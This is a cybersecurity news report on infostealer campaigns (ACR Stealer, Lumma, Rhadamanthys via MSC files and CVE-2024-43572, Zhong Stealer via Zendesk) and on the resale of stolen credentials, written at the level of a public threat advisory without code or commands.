Cybersecurity experts raise alarms about a new malware campaign that exploits cracked software to spread information stealers, specifically Lumma and ACR Stealer. The AhnLab Security Intelligence Center (ASEC) reports a significant increase in ACR Stealer distribution since January 2025.
Dead Drop Resolver Technique
A key feature of this malware involves a technique called a dead drop resolver. This method allows the malware to extract the actual command-and-control (C2) server. Attackers use legitimate platforms like Steam, Telegram’s Telegraph, Google Forms, and Google Slides. ASEC explains that “threat actors encode the actual C2 domain in Base64 format on a designated page.” The malware retrieves this page, decodes the string, and acquires the true C2 domain address to execute malicious activities.
ACR Stealer Capabilities
Previously, ACR Stealer spread through Hijack Loader malware. This stealer collects various types of information from infected systems, including files, web browser data, and cryptocurrency wallet extensions.
MSC File Exploitation
In a related development, ASEC identified another campaign that uses files with the “MSC” extension. These files execute through the Microsoft Management Console (MMC) to deliver the Rhadamanthys stealer malware. ASEC notes that “two variants of MSC malware exist: one exploits the vulnerability in apds.dll (CVE-2024-43572), while the other executes commands using Console Taskpad.”
Attackers disguise the MSC file as an MS Word document. When users click the ‘Open’ button, the file downloads and executes a PowerShell script from an external source. This script contains an EXE file (Rhadamanthys). CVE-2024-43572, also known as GrimResource, first appeared in reports from Elastic Security Labs in June 2024. Malicious actors exploited it as a zero-day vulnerability before Microsoft patched it in October 2024.
Exploiting Chat Support Platforms
Malware campaigns also target chat support platforms like Zendesk. Attackers impersonate customers to trick support agents into downloading a stealer called Zhong Stealer.
The Scale of Compromised Systems
A recent report from Hudson Rock reveals that over 30 million computers have fallen victim to information stealers in recent years. This trend has led to the theft of corporate credentials and session cookies. Cybercriminals sell these stolen credentials on underground forums, enabling further malicious activities within sensitive corporate environments.
Hudson Rock states, “For as little as $10 per log (computer), cybercriminals can acquire stolen data from employees in classified defense and military sectors.” Understanding the full network of compromised credentials and third-party risks is crucial, as infostealer intelligence goes beyond merely detecting infections.
